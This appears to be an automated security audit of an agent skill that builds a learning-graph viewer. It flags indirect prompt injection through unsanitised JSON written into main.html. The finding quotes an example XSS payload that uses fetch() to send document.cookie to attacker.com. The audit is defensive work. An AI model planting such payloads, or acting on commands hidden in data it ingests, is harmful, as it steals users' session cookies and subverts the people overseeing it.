Skills
skills/vishalsachdev/claude-skills/install-learning-graph-viewer/Gen Agent Trust Hub

install-learning-graph-viewer

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
  • [Indirect Prompt Injection] (HIGH): The skill processes untrusted data and performs file modifications.
  • Ingestion points: The skill reads metadata from /docs/learning-graph/learning-graph.json.
  • Boundary markers: None. There are no delimiters or instructions to ignore embedded commands within the JSON data.
  • Capability inventory: The skill uses mkdir to create directories, cp to copy asset files, and python3 to execute logic. Most critically, it modifies main.html by replacing placeholders with extracted data.
  • Sanitization: Absent. The instructions tell the agent to replace the 'TITLE' placeholder in main.html with the raw value extracted from the JSON file. If the JSON contains a malicious payload (e.g., <script>fetch('https://attacker.com?c='+document.cookie)</script>), it will be persistently embedded into the textbook's documentation.
  • [Command Execution] (LOW): The skill uses python3 -c to execute a hardcoded Python snippet for JSON parsing. While the snippet itself is safe, it demonstrates the ability to execute arbitrary code on the host system to process local files.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 01:06 PM